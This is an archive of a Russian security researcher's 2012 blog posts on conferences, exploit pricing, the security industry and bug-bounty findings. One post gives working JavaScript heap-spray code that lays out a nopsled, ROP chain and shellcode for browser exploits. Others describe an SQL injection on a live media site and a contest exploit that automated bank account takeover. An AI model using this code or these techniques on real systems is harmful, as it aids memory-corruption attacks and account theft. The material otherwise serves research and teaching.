среда, 28 ноября 2012 г.

На тему круглого стола...

Ну вот, начало конца этого блога уже скоро 8) Тем не менее, иногда прет... да надо молчать, но иногда остановить некому, итак, блого-запись на тему Ресерчeров, девелоперов, баг-хантеров и ИБ индустрии...

Преамбула.

На прошедшей конфе #Zeronights эта тема была вынесена в отдельный поток "круглого стола", но тема зародилась давно, и уже мусолилась у Токсы, и на Риспе:


Поток.

В контексте этой истории -  все это хорошо объяснимо. Для чего делаются исследования? Вот если ответить на этот вопрос, честно и беспристрастно, то станет понятно, что большинство ресерча бесполезно, ибо цели интересны узкому кругу лиц. Вообще ИБ индустрия - это узкий круг лиц, и рынок там - "натуральное хозяйство". ИБшники это кто, возьмем систему Тохи:

1) Менеджеры ИБ в компаниях.
2) Ресерчеры - баг-хантеры.
3) Вендоры ИБ
4) Регуляторы

И что получается? Что система замкнута. Ресерчеры изображает из себя хакеров, находят XSS, хвастаются ею, создают повод, для того, что бы менеджер ИБ могу купить то, что произвел на свет вендор ИБ. А еще есть Регуляторы, которые тупо говорят: всем покупать и тратить деньги, иначе рынок умрет 8)  В 90% рынка - это так (субъективное мнение). Это тупик. Провал. В итоге мы имеем тонны Г.Пиара от Ресерчеров, которые хотят куски котлет. Вендоров ИБ, которые встроились в систему.  В итоге что же ресерчеры? Они тоже бывают разными, кто делает ресерч ради фана, кто ради ПР и бизнеса, кто ради реальной цели - взломать что-то. Так вот в последнем случае это хотя бы оправданный ресерч. Человек хочет что-то сломать, делает исследование, находит багу, методу, вектор атаки, ломает и приносит себе реальную выгоду. А ради фана? Смотри пример с электронными замками. Чувак получил фан, сгонял в Лас-Вегас, но на этом все. Пользу получили воры. Все остальные (разработчики, владельцы) только ущерб. ИМХО: полезность такой ресерч принес бы только бы только в процессе разработки.

Вывод.

ИБ-ресерч в отрыве от процесса разработки и эксплуатации - бесполезен. Да вы нашли 100 багов, ну 1000, ну и что? Их еще потом 1000 будет, после вас, другие то же найдут. Гонятся за цифрами или ПР-ом  круто, но толку вселенной это не принесет.  Актуальность некоторых ресерчей - то же большой вопрос. ИБ - индустрия, особенно в России (но на самом деле на западе примерно такая же идея, только чуть впереди по развитию) - жалкое зрелище, есть отдельные исключения, но в целом, все вместе - унылая ветка по срубанию бабла. До 200x года было веселее, тогда люди делали ресерч ради реального профита и угара, и это двигало всех совершенствовать защиту и развивать процессы, но теперь все застопорилось.

Не претендую на правдивость всего сказанного или того, что я буду так думать через какое-то время, но уверен, что ИБ в отрыве от разработчиков, процессов и эксплуатации - просто махание шашкой. Консультанты, интеграторы, регуляторы - просто элементы системы иногда даже паразитические 8)

пятница, 23 ноября 2012 г.

HeapSpray

Мини блого-запись  о хипспрее.

Забавно, но в Интернетах говорят о всяких Bubble и Nozzle, и в частности относительно FF и IE9. Я вот прочитав следующие блоги:

https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/
http://www.greyhathacker.net/?p=549

... был убежден в эффективности данных методов и даже рассказывал об этом на воркшопе, но сегодня захотелось мне определить порог детектирования HeapSpray. И тут то я понял, что истинная причина того, почему все эти методы из блогов работают, не в том, что они добавляют рандомный  код в начали строки и обманывают сложные алгоритмы, а в том, что там есть конкатенация в цикле. Другими словами не надо усложнять код и добавлять счетчик или не-ассемблерные инструкции и тд. Достаточно сделать конкатенацию! Все просто, не усложняйте себе жизнь ;)

P.S. Прошу считать это за дополнение к воркшопу, где рассказывалось об методе Корелана. Теперь рабочий код для HeapSpray много проще (greyhathacker.net базовый вариант):


  1. var heap_chunks;
  2. function heapSpray(rop,shellcode,nopsled)
  3. {
  4.          var chunk_size, headersize, nopsled_len, code;
  5.          var i, codewithnum;
  6.          log.innerHTML+="<br><b>Stage 2. HeapSpraay...";
  7.          chunk_size = 0x40000;
  8.          headersize = 0x10;
  9.          nopsled_len = chunk_size - (headersize + rop.length + shellcode.length);
  10.          while (nopsled.length < nopsled_len)
  11.                 nopsled += nopsled;
  12.          nopsled = nopsled.substring(0, nopsled_len);
  13.          code = nopsled + rop + shellcode;                            
  14.          heap_chunks = new Array();
  15.          for (i = 0 ; i < 1000 ; i++)
  16.          {
  17.                 codewithnum = "HERE" + code;
  18.                 heap_chunks[i] = codewithnum.substring(0, codewithnum.length);
  19.          }
  20.  }

пятница, 12 октября 2012 г.

ZeroNights 2012

В преддверие Zeronights Episode 0x02, хотел бы поделится той работой что я проделал для этой конфы  и мыслями по этому поводу. Инсайд.

  Я конечно со-организатор, но  что это значит? В основном то, что  ты говоришь другим организаторам свое виденье того,  что и как должно быть, слушаешь других или споришь с ними. В финале вы все дружно принимаете решение и делаете  все по намеченному плану. Честно говоря, делать конфы - это ад. Неблагодарная работа. Ведь всем не угодишь, не то, что посетителям, но и даже своим коллегам. Было много спорных моментов, например о запуске этого самого второго эпизода в Москве, да и в других темах были споры, где у оргов мнение расходилось, но я не буду здесь писать об этом, я расскажу о практической части работы и том опыте, что я получил.


CFP

  Мне досталась роль админа панели.  В прошлом году я тоже там был, но панель сильно изменилась. Если в прошлом году были известные личности со всего мира, которым мы рассылали заявки и ждали фидбека, то в этом году все было иначе. В прошлом году было немного тупо - отправил ты, значит, людям пачку текстовок и ждешь... ждешь... не динамично это. Потом не все отсылали вес вовремя, а кое-кто вообще забыл 8)  Так что мне не понравилось делать это по мылу. В этом году CFP была 'online', прямо в гугл-доках. Каждый мог в своем столбике откомментить тот или иной доклад, поставить цветовую оценку. Красиво, наглядно и эффективно. Кто оценивал? Все те кто принимает участие в жизни DCG#7812. Кто откликнулся в группе (кстати не много, кто), кто захотел повлиять на список докладов, тот это мог сделать и сделал. Имена я называть не буду, кто хочет сам расколется ) Но в основном это всем нам знакомые имена, так сказать лучшие представители Российской белой сцены. Плюсы очевидны - живая дискуссия, каждый рецензент имеет опыт кто в чем, и поэтому и веб и бинарщина была оценена по достоинству проффи.

  Мы получили ~60 заявок. И в этот раз Россиян было много! Это радует, итак: патриотический момент, процент заявок от исследователей по географическому признаку (Fast Track не включен в статистику)!


  • СНГ - 44%
  • Заграница - 56%

На самом деле эти показатели просто замечательные. Я горд за активность наших людей. это правильно. А теперь процент пробива: то же самое, но только по прошедшим докладам...



  • СНГ - 49%
  • Заграница - 51% 

Это говорит о том, что заявки в общей массе были примерно одинаковые, даже может отечественный контент  был чуточку более качественными (по мнению комиссии). Думаю что это правильно, конфа родная, отечественная, и многие готовили что-то специально для неё. К сожалению новых лиц, среди русских заявок не так уж много. Это печально. С другой стороны  - стабильно ;)

Воркшоп

Теперь про мой контент. Собственно я решил попробовать силы в создании воркшопа. Воркшоп на тему разработки эксплойтов для Win7 под x32. С уклоном в сторону браузеров. На примере IE9. Будет пройден путь от простого BoF эксплойта, до сложного BoF эксплойта, который обходит DEP, ASLR, GS /safeSEH. При этом ASLR мы обойдем двумя способами (в том числе рассмотрим как можно использовать BoF для утечки адреса из ASLR модуля, с последующим построением ROP по утекшему базовому адресу). Кроме того мы коснемся Use-After-Free багов, их эксплуатации в той же среде и так же с частным примером того как "угонять" адреса для обхода ASLR. Это я к тому, что будет не просто банальное - "а теперь обходим ASLR, так как наш модуль скомпилирован без поддержки ASLR", хотя и этот кейс мы тоже рассмотрим. Кроме того мы поговорим про  HeapSpray. Все это я ДОЛЖЕН уложить в 5 часов. Задача не простая. Я уже пробовал силы, с меньшим объемом информации в сентябре на встречи DCG - пошло туго, особенно если много народу 8( Поэтому базовые вопросы написания эксплойтов я буду не полностью разжевывать.  Кстати, судя по всему, мой воркшоп будет на второй день конфы, а в первый день будет похожий воркшоп (4 часа) от Рика Флореза из Rapid7, там будет заточка на метасплойт и базовые вещи.  Да... программа будет насыщенной... не знаю даже как я бы поступил... и на воршоп идти охота и доклады послушать..ппц, а еще же конкурсы...

Конкурс

В прошлом году я написал один левел для Zeronights Hack-Quesr, который делал ONsec,  такой простой левел с AES-CBC. Его многие прошли, судя по врайтапам, что не плохо 8) В этом году мы с друзьями решили замутить небольшой хакквест. Он продет в рамках конференции. начнется в первый день.... и до победного конца. Это будет гонка. Первые два финалиста получат ценные призы от NOKIA. Он не только на cекурити тематику, но и на смекалку 8) Первая часть вообще ни как не будет завязана на секурити. Мы хотели создать ПРОСТОЙ, но интересный хак-квест, который не сильно бы отвлекал от основной программы. Но в конце надо будет пописать сплойты, так что...

Как вы понимаете, на конфе будет еще много чего интересного, например, что отметил бы лично я:

Про воркшопы мы уже говорили, но их будет МНОГО и они будут крутыми, еще ДАЛЕКО не вся программа опубликована, но из того что уже доступно, кроме Рика Флореза, будет любопытный воркшоп про RFID - http://2012.zeronights.ru/workshop#salamatin-cumanov . Это точно стоит посетить, кроме того доклады про безопасность Авиа систем (http://2012.zeronights.ru/program#kostin) и Ruby (http://2012.zeronights.ru/program#joernchen) вызывают у меня не поддельный интерес, я уже не говорю про то, что Владимир Воронцов с Александром Головко решили нам раскрыть 0дэй техники в своем докладе -  http://2012.zeronights.ru/program#vorontsov-golovko . Интересным обещает быть и тема Никиты  про безопасность NFC и EMV - http://2012.zeronights.ru/program#abdullin. И это не все, на что я бы хотел попасть.  Быть "оргом" утомительно и не всегда будет возможность бегать по докладам 8(( Но программа получилась просто отличной на мой взгляд. Это при том, что есть еще пачка докладов, которые не в паблике, и готовятся к публикации на сайте... там еще стока вкусного, надеюсь эти имена вам о чем то говорят: Solar DesignerАлиса EsageНикита Тараканов... да, никаких соплей, только мясо! Никаких перс-данных  и нытья про регуляторов и бумажки! Никаких дед-садовских тем в угоду пиджакам и грязного ПР на почве того, что массы не шарят в теме! Только ресерч, технологии, хитрые трюки и хаки, реальная защита и реальные атаки на то, чем мы пользуемся дома или на работе.

(Патриотичненький пост получился... хммм...)

четверг, 21 июня 2012 г.

Стоимость эксплойта...

Прочитал тут новость:  http://www.securitylab.ru/news/426076.php


Суть:


"Некий Джонатан Несс (Jonathan Ness), менеджер по информационной безопасности Trustworthy Computing (одно из подразделений Microsoft) заявил, что софтверный гигант разрабатывает методы уменьшения количества атак с использованием эксплойтов путем увеличения затрат, необходимых для обнаружения и использования уязвимостей.

...



1. Увеличение количества инвестиций, необходимых для поиска опасных уязвимостей.
2. Увеличение количества инвестиций, необходимых для написания функциональных и работоспособных эксплойтов.
3. Сокращение возможности хакеров вернуть свои инвестиции."

(с) SecurityLab



Как обычно - комментарии радуют 8)  Но я вот поделюсь своими мыслями...


На самом деле Несс прав и более того, то о чем он говорит происходит последние лет 7-8.  Печально, что читатели секлаба не видят разницы между "уязвимостью"  и "эксплойтом". Ведь на самом деле большенство уязвимостей не стоят и гроша. Хотя затраты на ихз поиск могут реально что-то стоить. но вот готовый эксплойт уже реально стоит денег. Если прикинуть, что средняя цена эксплойта под ходовой продукт будет около 100.000$, то очевидно, что для повышения стоймости разработки этого эксплойта приведет к повышению его цены.  Из чего складывается цена эксплойта для браузера или плагина к браузеру для win32 (как пример)?


1. Затраты на поиск узвимости V1
    1.1  Разработка фаззера
    1.2  Организация фаззинга (генерация данных, тестирование)
    1.3  Реверсинг и бинарный анализ
    1.4  Анализ исходных кодов (если доступны)2. Захват контроля
    2.1  Контроль EIP (ESP)
        2.1.1 Обход safeSEH
        2.1.2 Обход SEHOP

        2.1.3 Обход /GS в стеке
        2.1.4 Обход защиты кучи

    2.2  Контроль над размещением шеллкода
        2.2.1 Обход DEP (ROP/JIT Spray)

        2.2.2 Обход защит от HeapSpray (Nozzle/Bubble)
    2.3  Передача управления
        2.3.1 Обход ASLR (эксплойт утечки адреса - V2 / Spray)
3. Выполнение произвольного кода
   3.1 Обход песочницы (ring0 эксплойт V3 /  escape эксплойт V4)

В 2002 году не было пунктов 2.1.1-2.1.4, 2.2.1-2.2.2, 2.3.1 и 3.1. В 2007 году не было 2.1.2, 2.2.2,2.3.1. Очевидно, что сложность разработки эксплойтов возрастает, как и цены! Чудесный пример Сергея Глазунова - что бы захакать Хром ему понадобилось 14 мини-эксплойтов. В простейшем же случае вам нужно 2 нормальных эксплойта - под браузер или плагин + эксплойт для ринг0, что бы вырваться из песочницы. Это значит что финальная цена вырастает пропорционально. Не говоря уж и о том, что обход ASLR и DEP по прежнему часто задача творческая и требующая дополнительных усилий. Ровно неделю назад писал эксплойт под SAP 2008 года. Там был /GS и DEP и не было SEH для обхода /GS.  Задача была решена, потому что тогда GS был слабенький ;) Сейчас тот же эксплойт под SAP 2010 года уже не написать так просто, мне лично в падлу 8)  А вот под SAP 2005 года намного проще - там же /GS нету. Так что чем больше будут усложнятся механизмы защиты - тем дороже будет разработка. Ну это, как бы, очевидно. Зато вот финальная цена эксплойта будет определятся следующими показателями:

1. Популярность продукта.

2. Стабильность эксплойта
3. Статус 0Day. (0day дороже, 1day дешевле. Ваш Кэп)
4. Вектор применения (чем меньше нужно сделать "жертве" для срабатывания, тем лучше-дороже / чем легче доставить до цели - тем дороже.)
5. Время от запуска до срабатывания (чем меньше, тем лучше).
6. Насыщенность рынка


Отсюда, мне думается, что на пункт 1 производитель ни как не повлияет 8) На пункт 2 - легко, все тем mitigations что они придумывают, в этом деле легонечко помогают. Пункт 3 - могут косвенно, если сами будут искать баги или с помощью ZDI. Например поробуйте найти в windows7 stack BoF? Нету? Ага, Майкрософт уже давно все самое простое нафаззил и нашел и горе-хакерам осталось искать что-то менее тривиальное =)
4 пункт не очевиден, но в целом повлиять на него сложно не ухудшив юзабилити продукта,  на что вендоры пойти не готовы. 5 - могут. И все это приведет к тому, что кол-во эксплойтов, стабильных и дешевых станет меньше, зато качественные и стабильные, будут стоить НАМНОГО дороже, чем сейчас, ведь на рынке их будет недостаток (пункт 6). Насколько 
и как в таком будущем изменятся цены - я не знаю 8) Если сейчас средняя цена 100к$, то думаю в 2000 она была не такой, почти уверен, что в 10 раз ниже....  Что будет в 2020? Веселое время, однако 8)

среда, 13 июня 2012 г.

Defcon встреча DCG#7812. Номер 10.

Юбилейная встреча нашей группы. Во-первых, она 10ая. Во-вторых, нам ровно ГОД. Да-да, ровно год назад мы собрались первый раз. А помните как все начиналось - http://devteev.blogspot.com/2011/05/defcon.html ?

Что нас ждет 15-го Июня 2012 года в СПбГПУ в 19-00? Три доклада и одна дискуссионная панель, где может высказаться каждый!


1. OAuth и что с ним можно сделать by Егор Хомяков
2. Целостность процессов ОС by Кетов Дмитрий и Нестеров Кирилл
3. Взлом VMware vCenter за 60 секунд by Александр Миноженко и /me

Дискуссионная панель: Offensive Security - WTF?

Дискуссионная панель для всех страждущих общения и обмена опытом. Тема дня - разработка эксплойтов, продажа эксплойтов, тесты на проникновение, любительский взлом. Где граница между злом, добром, честностью и бизнесом? Откровения и признания! Тайны, интриги, расследования!

Let's fucking rock! Oi!Oi!Oi! и тд и тп 8)

P.S.  Ах да, карта, адреса, явки: https://defcon-russia.ru/10.php

суббота, 2 июня 2012 г.

PHDays. Write-up.


Раз я веду блог, то глупо было бы не написать о своих впечатлениях, о таком громком мероприятии как PHDays.

До…

Событие обещало быть легендарным. В прошлом году именно PHDays сделало первый шаг в сторону «техники» и «хака». Это был смелый шаг и он удался. В этом году обещали уже и западных докладчиков с интересными темами, и целых два дня угара. По взрослому уже. Что же, любой человек, который, так или иначе, увлекается темой ИБ просто обязан был попытаться попасть туда. Мои коллеги  (Саша Поляков aka @sh2kerr, Дмитрий Евдокимов aka @evdokimovds и Саша Миноженко aka @al3xmin) уже были в программе как докладчики или как участники CTF. А мне пришлось в последний момент готовить (опять же с Сашей Миноженко) доклад про взлом VMware. И, о счастье. Нашлось меcто в секции FastTrack. Так что один из вариантов попасть на событие – быть прямым учаником, докладчиком или пройти отборные в CTF. Второй вариант – быть приглашенным. Как я понял, эта группа друзей и клиентов компании-организатора. Поэтому вдвойне приятно, что они пригласили и наших коллег и всех тех, кто занимается ИБ. На мероприятии я увидел почти всех знакомых мне деятелей ИБ! А это очень важный момент на таких мероприятиях 8) Более того, я познакомился с теми, кого знал например только по Твиттеру или блогам. Это огромный плюс организатору, ведь коммунити такой любви и внимания не забудет ;) К сожалению надо признать, что всем остальным. Кому не посчастливилось быть либо непосредственным участником программы либо приглашенным приходилось надеется на открытию регистрацию с оставшимися местами. Это самый неприятный момент всего PHDays, но оргов понять можно – зал не резиновый, а вход бесплатный. Поэтому  раздача оставшихся мест напоминало выходку Дурова в день города. Говорят даже получался эффект недоступности сервиса из-за наплыва желающих. В итоге за 8 минут все места были разобраны. Но надо сказать, что организаторы сделали еще доп. регистрацию, так что, надеюсь, обиженных не оказалось. Кроме того, если очень захотеть, то найти путь «проникновения» на конференцию не так уж сложно. Например, я в первый день потерял совой бейдж и спокойно ходил без него. Охранник подошел всего один раз, но мер не предпринял (достаточно добрый и приятный человек).

Во-время…

Место было выбрано удачно – центр города, рядом метро. Помещение хорошее, залы хорошие, экраны… ну вообщем то же хорошие. Звук отличный. Вообще организация была великолепной. В плане тех. обеспечения и удобства. Везде  есть места где можно присесть, есть на что посмотреть. Глаза всегда заняты чем-то. Это круто. Общий стиль выдержан достаточно хорошо, а на самом деле просто отлично 8) Сами организаторы выглядели измучено, но всегда помогали и не бросали в беде. Это просто превосходно, поэтому хочу сказать всем тем позитивным ребятам, когда я доставал их с всякими проблемами – СПАСИБО!

Доклады…

Треков много, они параллельны и приходилось выбирать куда идти. Но выбор был не сложным, так как технических и интересных докладов было не так много 8( Но те что были, были первоклассными 8) Отмечу:

Тревис Гудспид – доклад про использование шумов и внедрения пакетов на первом уровне! Весело, оригинально и интересно. Докладчик хорошо доносит тему, я правда слегка упустил идею с организацией шума, но потом мне объяснили и эту задачу 8)

Никита Тараканов и Александр Бажанюк – использование BitBlaze при фаззинге. Доклад хороший, технический, а главное очень объективный в плане возможностей по использованию сабжа. Очень жаль, что лично Саша не приехал по объективным причинам в Москву, очень хотелось бы пообщаться лично.

Маркус Нимец – тап-джекинг. Да это забавный доклад, а главное показывает, как обойти  такие вещи как «ограничение на звонки и запуск приложений» за счет багов юзер интерфейса. Посмотрим, конечно, будут-ли такие такие атаки реализованы злоумышленниками, но с точки зрения общей модели безопасности Андройда – явный фейл.

Александр Матросов и Евгений Родионов – очень любопытный доклад-обзор на тему атак интерфейсов смарт-карт реальными вредоносами. Считаю что именно такими и должны быть доклады антивирусников. К примеру, все три доклада от Касперских – унылы с точки зрения техники и были общими и пугательными. Хотя я уверен, что они могли бы и что-то адовое рассказать, но видимо ЦА была другая… да, да - для «пиджаков»  и таких докладов для детей или пиджаков было много 8(

Андрей Костин – знаменитый хакер, который ломает то, что любой пен-тсетер часто игнорирует при  работах – принтеры. Реально интересный и зрелищный доклад.

Владимир Воронцов – про XXE атаки и о том, как прочитать валидный XML документ. Хорошо рассказано, даже 0дэей показал 8) а главная ценность доклада – практическая применимость в реальной жизни. Например при тех-же пен-тестах. Люблю такие доклады и поэтому, несмотря на  то. что он был в 9 утра второго дня, мы, с болью в голове и не выспавшиеся пришли на него… и мест в зале не было 8) Это круто!

Кстати, потом Володя сделал «доклад инжешн атаку» атаку и на секции фасттрек незапланированно рассказал про особенность нового РФЦ, а именно про то, что теперь согласно новой религии стандарта, все под домены могут читать куки домена более высокого уровня. Я бы даже назвал этот доклад «breaking news» 8)

Кроме того, доклад Владимира Кочеткова был техничным и хорошим, и реально интересным. Так же были и другие интересные доклады от Сергея Щербеля, Мирослава Штампара, Дмитрия Склярова и  Андрея Беленко, Федора Ярочкина и Владимира Кропотова, Александра Лямина (кстати, Александр потом рассказывал, что есть более интересная тема, про вынос nginx и предложил нам его на Zeronights. Я попросил рассказать детали, но Александр молодец - не сдал 0дэя и рассказал мне только про slowloris-подобие, но надеемся, что на ZN этот доклад все же состоится).
 
Дмитрий Скляров показывает как некоторые девелоперы выбирают алгоритм для генерации случайных чисел 8)
 А как же Шнаер? Нет, про его доклад ничего плохого сказать не могу. А вот хорошее скажу – складно говорит, интересно слушать. Вообще сложилось впечатление, что больше всего люди хотели просто сфотографироваться с ним 8) А как же Solar Designer? Доклад может и «исторический», но человек он интересный и очень умный, жаль пообщаться не удалось особо.
 К сожалению фасттрек был не в зале, а прямо в проходе. Так что тем, кто говорил тихо и скромно - было тяжело. Вообще фасттрек прошел как то скучно. Надеюсь я там не очень нес чепуху –чувствовал себя не очень (ветер, алкоголь, недосып… ну типа я оправдываюсь). 
Мастер классы…
 
Говорят, что были унылы и для «нубов». Я был только на одном – про HTML5. Да, он общий конечно, но вот не унылый. Все подготовлено на хорошем уровне – тесты, задачи. Демонстрации. Все красиво и эффективно для обучения. Так что спасибо Андресу Рьянчо (@w3af). Отличная работа!
 Ну теперь пару неприятных моментов – остальные доклады были уж больно «пиджачные» или унылые. Так хакеры Москву не взламывают ).Это лично мое мнение. Возможно, я зануда и придираюсь. Простите меня за это. Так же – во второй день народу пришло явно меньше чем в первый.
 Про халяву, еду, пиво и односолодовый виски вы прочитаете в других врайт-апах, а я дальше расскажу про конкурсы. 
Федор Ярочкин, Александр Поляков и я – встретились на лодке. Прямо как в Амстердаме в 2010, тогда мы так же катались на лодке… (ностальгия)
 
 
Конкурсы.
 Одной из особенностью PHDays это его CTF. Я не участник этого праздника хака, но могу сказать, что редко где такое внимание и любовь дается участникам CTF. Конечно заставлять играть два дня подряд и всю ночь может и безжалостно, но это для тру-хакеров - стойких нервами и обладающих выносливостью и усидчивостью. Короче не для меня 8) Но я очень рад. Что победила там наша команда из LeetMore. Во-первых. Это команда из Питера, во-вторых там играет мой коллега по работе - @al3xmin, в-третьих там много классных и умных ребят. И не удивительно, ведь Книга Дракона для них классическое чтиво. А вот я её не читал и воспринимаю этот пробел как свой личный недостаток как специалиста 8) (todo: купить и прочитать).
 Кроме CTF было и много других конкурсов, но  я выделю один. Где мы приняли участие. Вернее я отказался участвовать сославшись на то, что я приехал сюда общаться, а не сидеть перед ноутом (который я так же не взял) но вот мои коллеги Дима @_chipik и Глеб @cherboff приняли этот челлендж. Конкурс – «Большой Ку$». За день до экшена, зарегистрированые участники получали образ ОС с развернутой системой ДБО и тестовой БД. Кроме того, понятно дело, давались исходники  этой самой ДБО. После того, как ты сутки искал баги, на второй день проходит конкурс: всем участникам дается свой логин и пароль к ДБО и карточка (реальная!), которая привязана к вашему счету. Дается около 30 минут. За это время участники должны захакать уже боевую инсталляцию ДБО, задача – перечислить деньги с других счетов на свой собственный, после чего с помощью выданной карточки снять ЖИВЫЕ деньги с банкомата, который был так же настоящим и стоял себе в сторонке и ждал победителей. Я так понимаю, организаторы замутили свой псевдо-процессинг, привязали его к СУБД ДБО и к банкомату. Очень классное решение и очень живой конкурс. Ведь бабло можно тырить не только с подготовленных аккаунтов, но и у других участников. Состояние счетов было выведено на экран и все 30 минут можно было видеть, как идет процесс и кто более крутой ворюга 8) Очень живой конкурс и тот кто его придумал – гений. Сами уязвимости были не тупо-вебскими, но и логическими. Наш сплойт перебирал ИД пользователей ДБО, сбрасывал им пароль через соответствующую багу (пропуск одного шага), заходил к ним в аккаунт получал баланс и все бабло переводил на наш счет. Для этого надо было обойти одноразовый пароль, что так же было сделано за счет алгоритма слабой генерации этого-самого кода. Для автоматизации всего это процесса была найдена бага в капчте, так что в итоге эксплойт все делал сам – полная автоматизация. Оператор только следил 8) Кроме того, был учтен и тот факт, что нас так же могут поиметь, поэтому наш эксплойт не только воровал но и защищал нас – менял пароль и сбрасывал сессию  раз в период. В итоге наши ребята получили второе место, обойдя таких именитых хакеров как CYBERPUNK и Raz0r, так что я ими очень горжусь. К сожалению, они не стали заморачиваться над другими багами в этом конкурсе – слабая генерация сессии и обход аутентификации в Хэлпдеске. Эти баги давали информацию об аккаунтах с цифровыми паролями (что в дальнейшим позволило их брутить) и, как следствие, получать доступ к аккаунтам с другим балансом. Если я ошибся, надеюсь, меня поправят...  Так что героем конкурса, стал GiftS, которые за эксплойтил эти слабости, занял первое место и украл заработал 3500 руб, а мои друзья - лишь второе место и 900 рублей 8) Все деньги банкомат честно выдал. Третье место досталось Raz0r
. Надеюсь, ребята расскажут, что там было в этом конкурсе еще! Но реально, конкурс удался... я получил массу удовольствий болея за ребят, глядя на хладнокровные лица участников и табло с таблицей баланса!
 
Участники конкурса «Большой Ку$h»
 Ах да, еще я выиграл в конкурсе футболок (в конкурсе script-kiddies):
 

 И конечно конкурс HACK2OWN. Он прошел с двумя пробивами: от Никиты Тараканова было получено повышение привилегий в Windows XP, а второй победитель – Павел Шувалов добился, вроде бы, выполнения кода через SMS в iPhone.
 
Никита Тараканов - двукратный призер 8)
 

 
Артур Геркис, Андрей Костин, Федор Ярочкин, я, Александр Поляков и Дмитрий Евдокимов.
 
Александр Матросов, я, Артур Геркис, Владимир Воронцов (кстати, победитель алко-хак конкурса «Наливайка»), Александр Поляков 8)

//Фото Артура Геркиса и Владимира Кропотова

вторник, 29 мая 2012 г.

Пресс-релиз в ИБ индустрии как красная тряпка для script-kiddies.


Пресс-релизы в сфере ИБ тема тонкая. Так пример:

http://www.securitylab.ru/news/425086.php

Цели такого дела ясны:

ВГТРК - "мы защищаем своих пользователей и печемся об их безопасности".
Другие - "мы крутые услуги поставляем и спасаем пользователей ВГТРК".

Но с другой стороны, я взял и зашел на сайт vgtrk.com и ради фана потратил ровно 2 секунды, чтобы поиграться с параметрами данного ресурса, как любой порядочный скрипт-кидди. Тут же всплыла SQL инъекция. Дальше я даже ничего смотреть не стал (и естественно я ничего не ломал и не похищал, я законопослушный гражданин). Мне, как пользователю, не интересно кто там и что делает, что за какие деньги продает и внедряет. Реально безопасность основного внешнего ресурса ВГТРК - отсутствует. Просто  и грязно. И мое внимание привлек именно пресс-релиз, так то я бы туда и не зашел. Другие, кстати, подхватили инициативу:

"@/*__CENSORED__*/:
там что-то страшное %) 40 БД под оракалом, 412 пользователей этих БД..."

Нет, я понимаю, что всякие ИБ процессы, это вам не кавычку в запрос в ставить - это сложные, дорогостоящие работы, проекты и контракты 8) Я не фанат теорий заговоров и распилов, но это же просто забавно, а главное подсознательно снижает доверие ко всем лицам данного проекта.

Дополнительный факт: та штука, что была внедрена в ВГТРК, прекрасно находит такие проблемы как SQLi. И это лишь дополнительно вызывает вопросы 8))

P.S. Пост нужно расценивать не как призыв к хактивизму, а именно как призыв оценить одну из проблем отечественной сферы ИБ...

понедельник, 21 мая 2012 г.

Яндекс.Почта. Предотвращение хакострофы

В ноябре прошлого года компания «Яндекс» провела конкурс на тему поиска уязвимостей в своем сервисе. Мне посчастливилось найти там пару дырочек и получить за это второе место. Так как за эти полгода я так и не опубликовал деталей (кроме как на встрече Defcon-Russia, но это было в устной форме для узкого круга посетителей), я решил восполнить этот пробел сейчас. Так что тут будет рассказ об одной из дырок, которая была обнаружена в рамках конкурса и оперативно закрыта компанией «Яндекс». Считаю, что конкурс полностью оправдал себя и позволил предотвратить страшные последствия, так что идея явно удачна, одни плюсы. Собственно рассказ будет о банальном отсутствии проверки авторизации в одном из скриптов, что могло привести к частичной компрометации более миллиарда писем лишь на одной ноде…


Начало



Мы на конференциях.

24 и 25 мая мои коллеги, Дима Евдокимов и Саша Миноженко поедут в Краков на CONFidence. К сожалению, из-за временных проблем с визой я пропущу это действо. Я очень скорблю, ведь Конфиденц это мега-угарное мероприятие с неповторимой атмосферой. Кроме того, одним из спикеров в Кракове будет сам Капитан Кранч (для тех кто не в курсе - http://en.wikipedia.org/wiki/John_Draper). Дополнительно отмечу, что Российскую делегацию спикеров дополнят товарищи из Москвы - Андрей Петухов и Карим Валиев.  

30 и 31 мая пройдет не менее замечательное событие - PHDays. Туда я уже попаду, как  и многие другие ребята из DSEC и DCG 7812. Так что, надеюсь, будет весело 8)

P.S. Мы, кстати, так же подготовили футболку к конкурсу на PHDays, аналогичную той, за которую Денис из PT получили приз на Zeronights 8)

P.P.S
Мы с Сашей Миноженко расскажем про взлом VMware vCenter  сервера, а так же про один 0дэй, который не запатчен. Ребята из VMware по этому поводу переживают, но на самом деле этот 0дэей трудно заэксплойтить без дополнительной баги, которую, мы и нашли в VMware vCenter (web бага). Только о второй баге мы сообщили им, так что она запатчена и потому первую трудно теперь заэксплойтить (до тех пор, пока не найдут еще какую-нибудь похожую багу).

понедельник, 16 апреля 2012 г.

Учимся ломать...

Продолжаем на хабре серию постов про взлом различных сервисов.
Собственно кросс-постить не хочу. Дам лишь краткое описание и линки:

Проникновение в Lotus Domino

Уже боянистая тема, но до сих пор не закрытый зеро-дей в Lotus Domino.
Описание ошибки, описание эксплойта:

Ломаем банк в стиле smash the stack!

Взлом отечественной системы ДБО. Поиск классической strcpy уязвимости НЕ глупым фаззингом. Создание ROP эксплойта.

Используем "Teensy" для выполнения произвольного кода через эмуляцию HID устройства. Обход Device-Locker 8)


Обманываем Яндекс.Пробки.


вторник, 27 марта 2012 г.

Цена 0day

Так как я теперь буду "бложить", то не могу не обойти вниманием такую тему, как добыча $$$ за уязвимости и эксплойты. Сия проблема будоражит умы многих не глупых людей (http://oxod.ru/?p=361 http://sgordey.blogspot.com/2012/03/blog-post_24.html). Выскажусь и я.

Суть истории в том, что компания Vupen найдя 0day багу в Google Chrome + возможность побега из песочницы (опять из флэша?) отказалась "сдавать" информацию о проблеме компании Google, т.е. вендору. Мотивация у них проста - они лучше продадут её своим клиентам(НАТО, гос. учреждения типа Немецкой полиции и т.д.) и заработают намного больше, чем предлагает Google. Типа это плохо, и настоящий вай-хаты так не делают.

